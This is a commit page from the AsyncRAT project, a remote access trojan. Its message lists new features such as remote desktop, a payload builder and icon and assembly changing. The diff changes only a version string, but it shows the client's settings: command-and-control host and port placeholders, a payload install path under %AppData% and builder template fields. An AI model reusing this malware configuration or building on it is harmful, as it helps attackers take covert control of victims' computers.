Update v0.4.9D

-Added option to clear logs
-Added torrent seed
-Added send client's exception
-Added temp socket class
-Added change icon and assmelby
-Fixed remote desktop
-Fixed thumbnails
-Update form1 menu
-Updated builder and notification - idea by @zeroal3nzi
This commit is contained in:
NYAN CAT 2019-05-24 05:58:12 +03:00
parent 9d8fa22be6
commit 4c1782bb01
2 changed files with 3 additions and 3 deletions

View File

@ -16,6 +16,6 @@ namespace AsyncRAT_Sharp
public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12"; public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate; public static X509Certificate2 ServerCertificate;
public static readonly string Version = "AsyncRAT 0.4.9C"; public static readonly string Version = "AsyncRAT 0.4.9D";
} }
} }

View File

@ -12,7 +12,7 @@ namespace Client
#if DEBUG #if DEBUG
public static string Ports = "6606"; public static string Ports = "6606";
public static string Hosts = "127.0.0.1"; public static string Hosts = "127.0.0.1";
public static string Version = "AsyncRAT 0.4.9C"; public static string Version = "AsyncRAT 0.4.9D";
public static string Install = "false"; public static string Install = "false";
public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe"); public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe");
public static string Key = "NYAN CAT"; public static string Key = "NYAN CAT";
@ -28,7 +28,7 @@ namespace Client
#else #else
public static string Ports = "%Ports%"; public static string Ports = "%Ports%";
public static string Hosts = "%Hosts%"; public static string Hosts = "%Hosts%";
public static string Version = "AsyncRAT 0.4.9C"; public static string Version = "AsyncRAT 0.4.9D";
public static string Install = "%Install%"; public static string Install = "%Install%";
public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%Folder%"), "%File%"); public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%Folder%"), "%File%");
public static string Key = "%Key%"; public static string Key = "%Key%";